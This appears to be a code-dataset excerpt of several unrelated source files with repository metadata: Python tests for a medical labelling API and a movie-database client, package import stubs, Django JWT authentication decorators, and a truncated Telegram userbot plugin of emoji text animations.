] | 379 | 2019-02-16T19:12:01.000Z | 2022-03-11T23:12:24.000Z | backend/tests/functional_tests/test_adding_new_label.py | kolszewska/MedTagger | c691c822dd23a9fb402d1314e7fe2e6bde898e9c | [
"Apache-2.0"
] | 16 | 2019-01-31T16:44:39.000Z | 2022-02-14T15:23:29.000Z | """Tests for adding new Labels to the system."""
import json
from typing import Any
from medtagger.storage.models import BrushLabelElement
from medtagger.definitions import LabelTool
from medtagger.repositories import (
datasets as DatasetsRepository,
label_tags as LabelTagsRepository,
tasks as TasksRepository,
)
from tests.functional_tests import get_api_client, get_headers
from tests.functional_tests.conftest import get_token_for_logged_in_user
def test_add_brush_label(prepare_environment: Any, synchronous_celery: Any) -> None:
"""Test for adding a Label made with Brush tool."""
api_client = get_api_client()
user_token = get_token_for_logged_in_user('admin')
# Step 1. Prepare a structure for the test
DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.BRUSH], task.id)
# Step 2. Add Scan to the system
payload = {'dataset': 'KIDNEYS', 'number_of_slices': 3}
response = api_client.post('/api/v1/scans', data=json.dumps(payload),
headers=get_headers(token=user_token, json=True))
assert response.status_code == 201
json_response = json.loads(response.data)
scan_id = json_response['scan_id']
# Step 3. Label it with Brush
payload = {
'elements': [{
'slice_index': 0,
'width': 128,
'height': 128,
'image_key': 'SLICE_1',
'tag': 'EXAMPLE_TAG',
'tool': LabelTool.BRUSH.value,
}],
'labeling_time': 12.34,
'task_id': TasksRepository.get_task_by_key('MARK_KIDNEYS').id,
}
with open('tests/assets/example_labels/binary_mask.png', 'rb') as image:
data = {
'label': json.dumps(payload),
'SLICE_1': (image, 'slice_1'),
}
response = api_client.post('/api/v1/scans/{}/MARK_KIDNEYS/label'.format(scan_id), data=data,
headers=get_headers(token=user_token, multipart=True))
assert response.status_code == 201
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
label_id = json_response['label_id']
assert isinstance(label_id, str)
assert len(label_id) >= 1
# Step 4. Fetch details about above Label and check image storage
response = api_client.get('/api/v1/labels/' + label_id, headers=get_headers(token=user_token))
assert response.status_code == 200
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
label_element_id = json_response['elements'][0]['label_element_id']
brush_label_element = BrushLabelElement.get(id=label_element_id)
assert brush_label_element.image
def test_add_point_label(prepare_environment: Any, synchronous_celery: Any) -> None:
"""Test for adding a Label made with Point tool."""
api_client = get_api_client()
user_token = get_token_for_logged_in_user('admin')
# Step 1. Prepare a structure for the test
DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.POINT], task.id)
# Step 2. Add Scan to the system
payload = {'dataset': 'KIDNEYS', 'number_of_slices': 3}
response = api_client.post('/api/v1/scans', data=json.dumps(payload),
headers=get_headers(token=user_token, json=True))
assert response.status_code == 201
json_response = json.loads(response.data)
scan_id = json_response['scan_id']
# Step 3. Label it with Point Tool
payload = {
'elements': [{
'slice_index': 0,
'x': 0.25,
'y': 0.5,
'tag': 'EXAMPLE_TAG',
'tool': LabelTool.POINT.value,
}],
'labeling_time': 12.34,
}
data = {
'label': json.dumps(payload),
}
response = api_client.post('/api/v1/scans/{}/MARK_KIDNEYS/label'.format(scan_id), data=data,
headers=get_headers(token=user_token, multipart=True))
assert response.status_code == 201
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
label_id = json_response['label_id']
assert isinstance(label_id, str)
assert len(label_id) >= 1
# Step 4. Fetch details about above Label
response = api_client.get('/api/v1/labels/' + label_id, headers=get_headers(token=user_token))
assert response.status_code == 200
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
assert len(json_response['elements']) == 1
assert json_response['elements'][0]['x'] == 0.25
assert json_response['elements'][0]['y'] == 0.5
def test_add_chain_label(prepare_environment: Any, synchronous_celery: Any) -> None:
"""Test for adding a Label made with Chain tool."""
api_client = get_api_client()
user_token = get_token_for_logged_in_user('admin')
# Step 1. Prepare a structure for the test
DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.CHAIN], task.id)
# Step 2. Add Scan to the system
payload = {'dataset': 'KIDNEYS', 'number_of_slices': 3}
response = api_client.post('/api/v1/scans', data=json.dumps(payload),
headers=get_headers(token=user_token, json=True))
assert response.status_code == 201
json_response = json.loads(response.data)
scan_id = json_response['scan_id']
# Step 3. Label it with Chain Tool
payload = {
'elements': [{
'slice_index': 0,
'points': [
{
'x': 0.2,
'y': 0.3,
},
{
'x': 0.5,
'y': 0.8,
},
],
'tag': 'EXAMPLE_TAG',
'tool': LabelTool.CHAIN.value,
'loop': False,
}],
'labeling_time': 12.34,
}
data = {
'label': json.dumps(payload),
}
response = api_client.post('/api/v1/scans/{}/MARK_KIDNEYS/label'.format(scan_id), data=data,
headers=get_headers(token=user_token, multipart=True))
assert response.status_code == 201
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
label_id = json_response['label_id']
assert isinstance(label_id, str)
assert len(label_id) >= 1
# Step 4. Fetch details about above Label
response = api_client.get('/api/v1/labels/' + label_id, headers=get_headers(token=user_token))
assert response.status_code == 200
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
assert len(json_response['elements']) == 1
assert json_response['elements'][0]['points'][0]['x'] == 0.2
assert json_response['elements'][0]['points'][0]['y'] == 0.3
assert json_response['elements'][0]['points'][1]['x'] == 0.5
assert json_response['elements'][0]['points'][1]['y'] == 0.8
assert not json_response['elements'][0]['loop']
def test_add_chain_label_not_enough_points(prepare_environment: Any, synchronous_celery: Any) -> None:
"""Test for adding a Label made with Chain tool."""
api_client = get_api_client()
user_token = get_token_for_logged_in_user('admin')
# Step 1. Prepare a structure for the test
DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
task = TasksRepository.add_task('MARK_KIDNEYS', 'Mark Kidneys', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('EXAMPLE_TAG', 'Example Tag', [LabelTool.CHAIN], task.id)
# Step 2. Add Scan to the system
payload = {'dataset': 'KIDNEYS', 'number_of_slices': 3}
response = api_client.post('/api/v1/scans', data=json.dumps(payload),
headers=get_headers(token=user_token, json=True))
assert response.status_code == 201
json_response = json.loads(response.data)
scan_id = json_response['scan_id']
# Step 3. Label it with Chain Tool
payload = {
'elements': [{
'slice_index': 0,
'points': [
{
'x': 0.2,
'y': 0.3,
},
],
'tag': 'EXAMPLE_TAG',
'tool': LabelTool.CHAIN.value,
'loop': False,
}],
'labeling_time': 12.34,
}
data = {
'label': json.dumps(payload),
}
response = api_client.post('/api/v1/scans/{}/MARK_KIDNEYS/label'.format(scan_id), data=data,
headers=get_headers(token=user_token, multipart=True))
assert response.status_code == 400
def test_add_label_with_tag_from_other_task(prepare_environment: Any, synchronous_celery: Any) -> None:
"""Test for adding a Label with Tag from other Task."""
api_client = get_api_client()
user_token = get_token_for_logged_in_user('admin')
# Step 1. Prepare a structure for the test
DatasetsRepository.add_new_dataset('KIDNEYS', 'Kidneys')
left_task = TasksRepository.add_task('MARK_LEFT', 'Mark Left', 'path/to/image', ['KIDNEYS'], '', [], [])
right_task = TasksRepository.add_task('MARK_RIGHT', 'Mark Left', 'path/to/image', ['KIDNEYS'], '', [], [])
LabelTagsRepository.add_new_tag('TAG_LEFT', 'Tag Left', [LabelTool.POINT], left_task.id)
LabelTagsRepository.add_new_tag('TAG_RIGHT', 'Tag Right', [LabelTool.POINT], right_task.id)
# Step 2. Add Scan to the system
payload = {'dataset': 'KIDNEYS', 'number_of_slices': 3}
response = api_client.post('/api/v1/scans', data=json.dumps(payload),
headers=get_headers(token=user_token, json=True))
assert response.status_code == 201
json_response = json.loads(response.data)
scan_id = json_response['scan_id']
# Step 3. Label it with an element with Tag from another Task
payload = {
'elements': [{
'slice_index': 0,
'x': 0.25,
'y': 0.5,
'tag': 'TAG_RIGHT',
'tool': LabelTool.POINT.value,
}],
'labeling_time': 12.34,
}
data = {
'label': json.dumps(payload),
}
response = api_client.post('/api/v1/scans/{}/MARK_LEFT/label'.format(scan_id), data=data,
headers=get_headers(token=user_token, multipart=True))
assert response.status_code == 400
json_response = json.loads(response.data)
assert isinstance(json_response, dict)
assert json_response['message'] == 'Invalid arguments.'
assert json_response['details'] == 'Tag TAG_RIGHT is not part of Task MARK_LEFT.'
| 41.215613 | 110 | 0.632452 | 1,396 | 11,087 | 4.803725 | 0.101719 | 0.069788 | 0.032956 | 0.042648 | 0.848494 | 0.809126 | 0.793319 | 0.777065 | 0.770206 | 0.770206 | 0 | 0.01895 | 0.233697 | 11,087 | 268 | 111 | 41.369403 | 0.770363 | 0.087309 | 0 | 0.714953 | 0 | 0 | 0.15639 | 0.021348 | 0 | 0 | 0 | 0 | 0.17757 | 1 | 0.023364 | false | 0 | 0.03271 | 0 | 0.056075 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8c1d7dfc92dd7e54ed018e6ef0459b6b19cf1f01 | 1,677 | py | Python | tests/methods_tests/test_genres.py | lycantropos/asynctmdb | 623dcfe0f4f599104d16d920d9a1f35dd82eac90 | [
"MIT"
] | null | null | null | tests/methods_tests/test_genres.py | lycantropos/asynctmdb | 623dcfe0f4f599104d16d920d9a1f35dd82eac90 | [
"MIT"
] | null | null | null | tests/methods_tests/test_genres.py | lycantropos/asynctmdb | 623dcfe0f4f599104d16d920d9a1f35dd82eac90 | [
"MIT"
] | 2 | 2020-11-04T02:56:38.000Z | 2020-11-05T08:12:04.000Z | import operator
import pytest
from aiohttp import ClientSession
from asynctmdb.methods import genres
from tests.utils import (is_positive_integer,
is_non_empty_string)
@pytest.mark.asyncio
async def test_movie_genres(api_base_url: str,
api_key: str,
session: ClientSession) -> None:
records = await genres.movie(api_base_url=api_base_url,
api_key=api_key,
session=session)
records_count = len(records)
records_ids = list(map(operator.itemgetter('id'), records))
records_names = list(map(operator.itemgetter('name'), records))
assert isinstance(records, list)
assert all(map(is_positive_integer, records_ids))
assert all(map(is_non_empty_string, records_names))
assert len(set(records_ids)) == records_count
assert len(set(records_names)) == records_count
@pytest.mark.asyncio
async def test_tv_genres(api_base_url: str,
api_key: str,
session: ClientSession) -> None:
records = await genres.tv(api_base_url=api_base_url,
api_key=api_key,
session=session)
records_count = len(records)
records_ids = list(map(operator.itemgetter('id'), records))
records_names = list(map(operator.itemgetter('name'), records))
assert isinstance(records, list)
assert all(map(is_positive_integer, records_ids))
assert all(map(is_non_empty_string, records_names))
assert len(set(records_ids)) == records_count
assert len(set(records_names)) == records_count
| 34.22449 | 67 | 0.644007 | 202 | 1,677 | 5.074257 | 0.227723 | 0.040976 | 0.058537 | 0.050732 | 0.84878 | 0.84878 | 0.792195 | 0.792195 | 0.792195 | 0.792195 | 0 | 0 | 0.267144 | 1,677 | 48 | 68 | 34.9375 | 0.834011 | 0 | 0 | 0.722222 | 0 | 0 | 0.007156 | 0 | 0 | 0 | 0 | 0 | 0.277778 | 1 | 0 | false | 0 | 0.138889 | 0 | 0.138889 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8c4c9e021eb2d9edb61c921370ba0518b77337b8 | 187 | py | Python | netsuite/__init__.py | fabriceb/netsuite | 6538f690b670786e692121ed874b2108ded95ae7 | [
"MIT"
] | 57 | 2018-10-05T19:15:29.000Z | 2021-10-14T14:35:20.000Z | netsuite/__init__.py | fabriceb/netsuite | 6538f690b670786e692121ed874b2108ded95ae7 | [
"MIT"
] | 26 | 2018-10-10T15:00:37.000Z | 2021-08-02T18:23:46.000Z | netsuite/__init__.py | fabriceb/netsuite | 6538f690b670786e692121ed874b2108ded95ae7 | [
"MIT"
] | 29 | 2018-10-31T21:34:33.000Z | 2021-05-24T05:46:38.000Z | from . import constants # noqa
from .client import * # noqa
from .config import * # noqa
from .rest_api import * # noqa
from .restlet import * # noqa
from .soap_api import * # noqa
| 26.714286 | 31 | 0.684492 | 26 | 187 | 4.846154 | 0.384615 | 0.31746 | 0.444444 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.224599 | 187 | 6 | 32 | 31.166667 | 0.868966 | 0.15508 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
8c63d17eb4b645d5bf6ec3863e58e2ba02687662 | 2,251 | py | Python | core/decorators.py | junlegend/back-landing-career | cfc01b439629e48ff058fa1693af8d5a3a37949a | [
"MIT"
] | null | null | null | core/decorators.py | junlegend/back-landing-career | cfc01b439629e48ff058fa1693af8d5a3a37949a | [
"MIT"
] | null | null | null | core/decorators.py | junlegend/back-landing-career | cfc01b439629e48ff058fa1693af8d5a3a37949a | [
"MIT"
] | null | null | null | import jwt
from django.http import JsonResponse
from users.models import User
from global_variable import SECRET_KEY, ALGORITHM
def login_required(func):
def wrapper(self, request, *args, **kwargs):
try:
access_token = request.headers.get('Authorization')
pay_load = jwt.decode(access_token, SECRET_KEY, algorithms=[ALGORITHM])
user = User.objects.get(id=pay_load['user_id'])
request.user = user
return func(self, request, *args, **kwargs)
except jwt.InvalidTokenError:
return JsonResponse({'message': 'INVALID_TOKEN'}, status=401)
except jwt.exceptions.DecodeError:
return JsonResponse({'message': 'DECODE_ERROR'}, status=400)
except jwt.ExpiredSignatureError:
return JsonResponse({'message': 'EXPIRED_TOKEN'}, status=401)
except User.DoesNotExist:
return JsonResponse({'message': 'USER_DOES_NOT_EXISTS'}, status=401)
except KeyError:
return JsonResponse({'message': 'KEY_ERROR'}, status=400)
return wrapper
def admin_only(func):
def wrapper(self, request, *args, **kwargs):
try:
access_token = request.headers.get('Authorization')
pay_load = jwt.decode(access_token, SECRET_KEY, algorithms=[ALGORITHM])
role = pay_load['role']
user = User.objects.get(id=pay_load['user_id'])
request.user = user
if not role == 'admin':
return JsonResponse({'message': 'UNAUTHORIZED'}, status=401)
return func(self, request, *args, **kwargs)
except jwt.InvalidTokenError:
return JsonResponse({'message': 'INVALID_TOKEN'}, status=401)
except jwt.exceptions.DecodeError:
return JsonResponse({'message': 'DECODE_ERROR'}, status=400)
except jwt.ExpiredSignatureError:
return JsonResponse({'message': 'EXPIRED_TOKEN'}, status=401)
except User.DoesNotExist:
return JsonResponse({'message': 'USER_DOES_NOT_EXISTS'}, status=401)
except KeyError:
return JsonResponse({'message': 'KEY_ERROR'}, status=400)
return wrapper | 40.196429 | 87 | 0.621057 | 231 | 2,251 | 5.917749 | 0.251082 | 0.144843 | 0.20117 | 0.061448 | 0.845647 | 0.845647 | 0.845647 | 0.845647 | 0.845647 | 0.845647 | 0 | 0.02 | 0.266992 | 2,251 | 56 | 88 | 40.196429 | 0.808485 | 0 | 0 | 0.8 | 0 | 0 | 0.120782 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.088889 | false | 0 | 0.088889 | 0 | 0.511111 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8c64d9136712e6e2b7919d748f49272408eb5a8d | 267 | py | Python | evennia/contrib/utils/random_string_generator/__init__.py | davidrideout/evennia | 879eea55acdf4fe5cdc96ba8fd0ab5ccca4ae84b | [
"BSD-3-Clause"
] | null | null | null | evennia/contrib/utils/random_string_generator/__init__.py | davidrideout/evennia | 879eea55acdf4fe5cdc96ba8fd0ab5ccca4ae84b | [
"BSD-3-Clause"
] | null | null | null | evennia/contrib/utils/random_string_generator/__init__.py | davidrideout/evennia | 879eea55acdf4fe5cdc96ba8fd0ab5ccca4ae84b | [
"BSD-3-Clause"
] | null | null | null | """
Pseudo-random generator - vlgeoff 2017
"""
from .random_string_generator import RandomStringGenerator # noqa
from .random_string_generator import RandomStringGeneratorScript # noqa
from .random_string_generator import RejectedRegex, ExhaustedGenerator # noqa
| 29.666667 | 77 | 0.831461 | 27 | 267 | 8 | 0.481481 | 0.138889 | 0.222222 | 0.347222 | 0.467593 | 0.324074 | 0 | 0 | 0 | 0 | 0 | 0.016878 | 0.11236 | 267 | 8 | 78 | 33.375 | 0.894515 | 0.202247 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
4fe506196fbc350d6238c63f1dde07550145038e | 162 | py | Python | catfood/apps/pulls/admin.py | dnsv/catfood-api | 5b89940a959a44eb3187ddb4d7bddc4e3dd32dbf | [
"MIT"
] | null | null | null | catfood/apps/pulls/admin.py | dnsv/catfood-api | 5b89940a959a44eb3187ddb4d7bddc4e3dd32dbf | [
"MIT"
] | null | null | null | catfood/apps/pulls/admin.py | dnsv/catfood-api | 5b89940a959a44eb3187ddb4d7bddc4e3dd32dbf | [
"MIT"
] | null | null | null | from django.contrib import admin
from .models import PinnedComment, PinnedPullRequest
admin.site.register(PinnedPullRequest)
admin.site.register(PinnedComment)
| 23.142857 | 52 | 0.851852 | 18 | 162 | 7.666667 | 0.555556 | 0.318841 | 0.376812 | 0.492754 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080247 | 162 | 6 | 53 | 27 | 0.926175 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 7 |
8cae81ee57b8e7d8e736678ebf9e6cf6f55b71ad | 22,163 | py | Python | userbot/plugins/animation4.py | Munnipopz/CatUserbot | b0e54241aad6b4778b99807c4f78c922ef7befa0 | [
"MIT"
] | null | null | null | userbot/plugins/animation4.py | Munnipopz/CatUserbot | b0e54241aad6b4778b99807c4f78c922ef7befa0 | [
"MIT"
] | null | null | null | userbot/plugins/animation4.py | Munnipopz/CatUserbot | b0e54241aad6b4778b99807c4f78c922ef7befa0 | [
"MIT"
] | null | null | null | from userbot import CMD_HELP
from telethon import events
import asyncio
from userbot.utils import admin_cmd
from userbot import ALIVE_NAME
import random, re
from collections import deque
DEFAULTUSER = str(ALIVE_NAME) if ALIVE_NAME else "Cat"
@borg.on(admin_cmd(pattern=f"snake$", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.3
animation_ttl = range(0, 27)
await event.edit("snake..")
animation_chars = [
"◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◼️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◼️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◼️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◼️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◼️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️\n◻️◻️◻️◻️◻️",
"◻️◻️◻️◻️◻️\n◻️◼️◻️◼️◻️\n◻️◻️◻️◻️◻️\n◻️◼️◼️◼️◻️\n◻️◻️◻️◻️◻️"
]
for i in animation_ttl:
await asyncio.sleep(animation_interval)
await event.edit(animation_chars[i % 27])
@borg.on(admin_cmd(pattern=f"human$", outgoing=True))
async def _(event):
if event.fwd_from:
return
animation_interval = 0.5
animation_ttl = range(0, 16)
await event.edit("human...")
animation_chars = [
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛🚗\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛🚗⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛🚗⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛🚗⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛🚗⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛🚗⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n🚗⬛⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬜⬜⬜⬜⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛⬛⬛⬛⬛\n⬜⬜⬜😊⬜⬜⬜\n⬜⬜⬜⬜⬜⬜⬜\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛😊⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬜⬛⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n🔲🔲🔲🔲🔲🔲🔲",
"⬛⬛⬛⬛⬛⬛⬛\n⬛⬛⬛😊⬛⬛⬛\n⬛⬜⬜⬜⬜⬜⬛\n⬛⬛⬛⬜⬛⬛⬛\n⬛⬛⬜⬛⬜⬛⬛\n⬛⬛⬜⬛⬛⬜⬛\n⬛⬛⬜⬛⬛⬛⬛\n🔲🔲🔲🔲🔲🔲🔲",
